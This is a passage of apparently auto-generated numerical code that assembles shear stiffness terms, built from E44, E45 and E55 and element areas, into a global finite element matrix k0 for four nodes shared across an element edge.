k0[i1*dof+4, i3*dof+2] += Ac1*(Ac1 + Ac2)*(-E45*b1 + E55*a1)/(4*(Ac*Ac)*Ae1)
k0[i1*dof+4, i3*dof+3] += Ac1*c1*(Ac1 + Ac2)*(-E45*b1 + E55*a1)/(8*(Ac*Ac)*Ae1)
k0[i1*dof+4, i3*dof+4] += Ac1*d1*(Ac1 + Ac2)*(-E45*b1 + E55*a1)/(8*(Ac*Ac)*Ae1)
k0[i1*dof+4, i4*dof+2] += Ac2*(Ac1 + Ac2)*(-E45*b2 + E55*a2)/(4*(Ac*Ac)*Ae2)
k0[i1*dof+4, i4*dof+3] += Ac2*c2*(Ac1 + Ac2)*(-E45*b2 + E55*a2)/(8*(Ac*Ac)*Ae2)
k0[i1*dof+4, i4*dof+4] += Ac2*d2*(Ac1 + Ac2)*(-E45*b2 + E55*a2)/(8*(Ac*Ac)*Ae2)
k0[i2*dof+2, i1*dof+2] += ((E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - (E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+2, i1*dof+3] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i2*dof+2, i1*dof+4] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i2*dof+2, i2*dof+2] += ((E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - (E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+2, i2*dof+3] += ((E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - (E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+2, i2*dof+4] += ((E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - (E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+2, i3*dof+2] += Ac1*(a1*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2)) - b1*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2)))/(4*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+2, i3*dof+3] += Ac1*c1*(a1*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2)) - b1*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+2, i3*dof+4] += Ac1*d1*(a1*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2)) - b1*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+2, i4*dof+2] += Ac2*(a2*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2)) - b2*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2)))/(4*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i2*dof+2, i4*dof+3] += Ac2*c2*(a2*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2)) - b2*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2)))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i2*dof+2, i4*dof+4] += Ac2*d2*(a2*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2)) - b2*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2)))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i2*dof+3, i1*dof+2] += ((E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - (E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+3, i1*dof+3] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i2*dof+3, i1*dof+4] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i2*dof+3, i2*dof+2] += ((E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - (E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+3, i2*dof+3] += ((E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - (E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+3, i2*dof+4] += ((E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - (E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+3, i3*dof+2] += Ac1*(a1*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)) - b1*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+3, i3*dof+3] += Ac1*c1*(a1*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)) - b1*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+3, i3*dof+4] += Ac1*d1*(a1*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)) - b1*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+3, i4*dof+2] += Ac2*(a2*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)) - b2*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i2*dof+3, i4*dof+3] += Ac2*c2*(a2*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)) - b2*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i2*dof+3, i4*dof+4] += Ac2*d2*(a2*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)) - b2*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i2*dof+4, i1*dof+2] += ((E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - (E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+4, i1*dof+3] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i2*dof+4, i1*dof+4] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i2*dof+4, i2*dof+2] += ((E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - (E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+4, i2*dof+3] += ((E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - (E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+4, i2*dof+4] += ((E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - (E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+4, i3*dof+2] += Ac1*(a1*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)) - b1*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+4, i3*dof+3] += Ac1*c1*(a1*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)) - b1*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+4, i3*dof+4] += Ac1*d1*(a1*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)) - b1*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+4, i4*dof+2] += Ac2*(a2*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)) - b2*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i2*dof+4, i4*dof+3] += Ac2*c2*(a2*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)) - b2*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i2*dof+4, i4*dof+4] += Ac2*d2*(a2*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)) - b2*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i3*dof+2, i1*dof+2] += Ac1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) + (E45*b1 - E55*a1)*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+2, i1*dof+3] += -Ac1*(Ac1 + Ac2)*(E44*b1 - E45*a1)/(4*(Ac*Ac)*Ae1)
k0[i3*dof+2, i1*dof+4] += -Ac1*(Ac1 + Ac2)*(E45*b1 - E55*a1)/(4*(Ac*Ac)*Ae1)
k0[i3*dof+2, i2*dof+2] += Ac1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*d1 + Ac2*Ae1*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+2, i2*dof+3] += Ac1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+2, i2*dof+4] += Ac1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+2, i3*dof+2] += (Ac1*Ac1)*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(4*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+2, i3*dof+3] += (Ac1*Ac1)*c1*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(8*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+2, i3*dof+4] += (Ac1*Ac1)*d1*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(8*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+2, i4*dof+2] += Ac1*Ac2*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+2, i4*dof+3] += Ac1*Ac2*c2*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+2, i4*dof+4] += Ac1*Ac2*d2*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+3, i1*dof+2] += Ac1*c1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) + (E45*b1 - E55*a1)*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+3, i1*dof+3] += -Ac1*c1*(Ac1 + Ac2)*(E44*b1 - E45*a1)/(8*(Ac*Ac)*Ae1)
k0[i3*dof+3, i1*dof+4] += -Ac1*c1*(Ac1 + Ac2)*(E45*b1 - E55*a1)/(8*(Ac*Ac)*Ae1)
k0[i3*dof+3, i2*dof+2] += Ac1*c1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*d1 + Ac2*Ae1*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+3, i2*dof+3] += Ac1*c1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+3, i2*dof+4] += Ac1*c1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+3, i3*dof+2] += (Ac1*Ac1)*c1*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(8*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+3, i3*dof+3] += (Ac1*Ac1)*(c1*c1)*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(16*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+3, i3*dof+4] += (Ac1*Ac1)*c1*d1*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(16*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+3, i4*dof+2] += Ac1*Ac2*c1*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+3, i4*dof+3] += Ac1*Ac2*c1*c2*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+3, i4*dof+4] += Ac1*Ac2*c1*d2*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+4, i1*dof+2] += Ac1*d1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) + (E45*b1 - E55*a1)*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+4, i1*dof+3] += -Ac1*d1*(Ac1 + Ac2)*(E44*b1 - E45*a1)/(8*(Ac*Ac)*Ae1)
k0[i3*dof+4, i1*dof+4] += -Ac1*d1*(Ac1 + Ac2)*(E45*b1 - E55*a1)/(8*(Ac*Ac)*Ae1)
k0[i3*dof+4, i2*dof+2] += Ac1*d1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*d1 + Ac2*Ae1*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+4, i2*dof+3] += Ac1*d1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+4, i2*dof+4] += Ac1*d1*(-(E44*b1 - E45*a1)*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) + (E45*b1 - E55*a1)*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i3*dof+4, i3*dof+2] += (Ac1*Ac1)*d1*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(8*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+4, i3*dof+3] += (Ac1*Ac1)*c1*d1*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(16*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+4, i3*dof+4] += (Ac1*Ac1)*(d1*d1)*(-a1*(E45*b1 - E55*a1) + b1*(E44*b1 - E45*a1))/(16*(Ac*Ac)*(Ae1*Ae1))
k0[i3*dof+4, i4*dof+2] += Ac1*Ac2*d1*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+4, i4*dof+3] += Ac1*Ac2*c2*d1*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i3*dof+4, i4*dof+4] += Ac1*Ac2*d1*d2*(-a2*(E45*b1 - E55*a1) + b2*(E44*b1 - E45*a1))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+2, i1*dof+2] += Ac2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) + (E45*b2 - E55*a2)*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+2, i1*dof+3] += -Ac2*(Ac1 + Ac2)*(E44*b2 - E45*a2)/(4*(Ac*Ac)*Ae2)
k0[i4*dof+2, i1*dof+4] += -Ac2*(Ac1 + Ac2)*(E45*b2 - E55*a2)/(4*(Ac*Ac)*Ae2)
k0[i4*dof+2, i2*dof+2] += Ac2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*d1 + Ac2*Ae1*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+2, i2*dof+3] += Ac2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+2, i2*dof+4] += Ac2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+2, i3*dof+2] += Ac1*Ac2*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+2, i3*dof+3] += Ac1*Ac2*c1*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+2, i3*dof+4] += Ac1*Ac2*d1*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+2, i4*dof+2] += (Ac2*Ac2)*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(4*(Ac*Ac)*(Ae2*Ae2))
k0[i4*dof+2, i4*dof+3] += (Ac2*Ac2)*c2*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(8*(Ac*Ac)*(Ae2*Ae2))
k0[i4*dof+2, i4*dof+4] += (Ac2*Ac2)*d2*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(8*(Ac*Ac)*(Ae2*Ae2))
k0[i4*dof+3, i1*dof+2] += Ac2*c2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) + (E45*b2 - E55*a2)*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+3, i1*dof+3] += -Ac2*c2*(Ac1 + Ac2)*(E44*b2 - E45*a2)/(8*(Ac*Ac)*Ae2)
k0[i4*dof+3, i1*dof+4] += -Ac2*c2*(Ac1 + Ac2)*(E45*b2 - E55*a2)/(8*(Ac*Ac)*Ae2)
k0[i4*dof+3, i2*dof+2] += Ac2*c2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*d1 + Ac2*Ae1*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+3, i2*dof+3] += Ac2*c2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+3, i2*dof+4] += Ac2*c2*(-(E44*b2 - E45*a2)*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) + (E45*b2 - E55*a2)*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i4*dof+3, i3*dof+2] += Ac1*Ac2*c2*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+3, i3*dof+3] += Ac1*Ac2*c1*c2*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+3, i3*dof+4] += Ac1*Ac2*c2*d1*(-a1*(E45*b2 - E55*a2) + b1*(E44*b2 - E45*a2))/(16*(Ac*Ac)*Ae1*Ae2)
k0[i4*dof+3, i4*dof+2] += (Ac2*Ac2)*c2*(-a2*(E45*b2 - E55*a2) + b2*(E44*b2 - E45*a2))/(8*(Ac*Ac)*(Ae2*Ae2))
